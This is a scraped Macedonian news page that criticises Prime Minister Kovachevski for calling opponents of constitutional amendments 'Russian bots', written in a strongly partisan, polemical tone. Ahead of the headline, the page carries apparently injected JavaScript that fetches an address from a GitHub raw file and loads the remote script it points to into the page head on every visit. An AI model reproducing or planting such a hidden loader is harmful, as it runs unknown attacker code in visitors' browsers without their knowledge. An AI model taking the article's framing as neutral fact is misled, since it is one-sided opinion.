;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Срамно: Ковачевски ги нарече „руски ботови“ Македонците кои се против уставните измени - Антропол
АктуелноЛокално

Срамно: Ковачевски ги нарече „руски ботови“ Македонците кои се против уставните измени

Октроираниот премиер Ковачевски ги нарече „руски ботови“ Македонците кои се против уставните измени и нивните претставници во парламентот. На ова навреда врз македонскиот народ и неговите демократски избрани претставници, премиерот неосновано додаде клевета дека оние кои размислуваат различно од Владата и се борат за националните интереси тоа го прават заради финансиски средства. Ова се случи на денешната прес-конференција во општина Аеродром.

„Со тоа се демантираат лагите дека ќе се бугаризира македонскиот народ, освен од неколку платени руски ботови и платени политичари и аналитичари, кои што мораат заради финансиски средства да го зборуваат тоа, но во тоа нема никаква суштина“, вели Ковачевски.

Во продолжение, Ковачевски нарекувајќи ја Македонија „Северна“ потврди дека бугаризацијата на државата и спроведувањето на „Софиската платформа“ не можат да го спроведат странци, туку домашните предавници, инсистирајќи на едноумие и на тоа дека за Македонија нема друга алтернатива.

„Во Северна Македонија не може странци да завршат работа. Тоа е работа која може да ја завршат само македонски политичари без разлика од која партија доаѓаат, а Македонија друг пат нема“, дециден премиерот Димитар Ковачевски.

Потсетуваме, овие притисоци за уставни измени се директна последица на „добрососедските договори“ кои и покрај предупредувањата за нивната штетност ги потпиша Заев и Димитров, а подоцна владата на ДУИ и СДСМ го прифати и „францускиот предлог“ во кој беа прифатени сите неразумни барања од бугарска страна, како услов за тргање на ветото со кое е блокиран европскиот пат на Македонија.